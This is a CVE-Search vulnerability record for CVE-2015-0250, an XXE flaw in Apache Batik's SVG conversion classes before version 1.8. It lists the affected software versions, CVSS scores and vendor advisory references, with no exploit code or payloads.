1. CVE-Search
  2. CVE-2015-0250
ID CVE-2015-0250
Summary XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file. <a href="http://cwe.mitre.org/data/definitions/611.html">CWE-611: Improper Restriction of XML External Entity Reference ('XXE')</a>
References
Vulnerable Configurations
  • cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*
    cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*
  • cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*
    cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*
  • cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*
    cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:-:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:-:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.0:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.0:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc1:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.1:rc1:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc2:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.1:rc2:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc3:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.1:rc3:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1:rc4:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.1:rc4:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.1.1:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.1.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta1:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5:beta1:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta2:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5:beta2:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta3:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5:beta3:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta4:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5:beta4:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta4b:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5:beta4b:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5:beta5:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5:beta5:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5.1:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.5.1:rc2:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.5.1:rc2:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.6:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.6:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.6.1:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.6.1:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.7:*:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.7:*:*:*:*:*:*:*
  • cpe:2.3:a:apache:batik:1.7:beta1:*:*:*:*:*:*
    cpe:2.3:a:apache:batik:1.7:beta1:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.0:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.1:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.1:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.2:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.2:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.1.0:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.1.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.2.0:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.2.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.0:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.1:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.1:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.0:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.1:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.1:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.3:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.3:*:*:*:*:*:*:*
  • cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.1.2:*:*:*:*:*:*:*
    cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.1.2:*:*:*:*:*:*:*
CVSS
Base: 6.4 (as of 04-11-2017 - 01:29)
Impact:
Exploitability:
CWE NVD-CWE-Other
CAPEC
Access
VectorComplexityAuthentication
NETWORK LOW NONE
Impact
ConfidentialityIntegrityAvailability
PARTIAL NONE PARTIAL
cvss-vector via4 AV:N/AC:L/Au:N/C:P/I:N/A:P
redhat via4
advisories
  • rhsa
    id RHSA-2016:0041
  • rhsa
    id RHSA-2016:0042
refmap via4
confirm
debian DSA-3205
fulldisc 20150322 [CVE-2015-0250] Apache Batik Information Disclosure Vulnerability (XXE Injection)
mandriva MDVSA-2015:203
misc http://packetstormsecurity.com/files/130964/Apache-Batik-XXE-Injection.html
sectrack 1032781
ubuntu USN-2548-1
Last major update 04-11-2017 - 01:29
Published 24-03-2015 - 17:59
Last modified 04-11-2017 - 01:29
Back to Top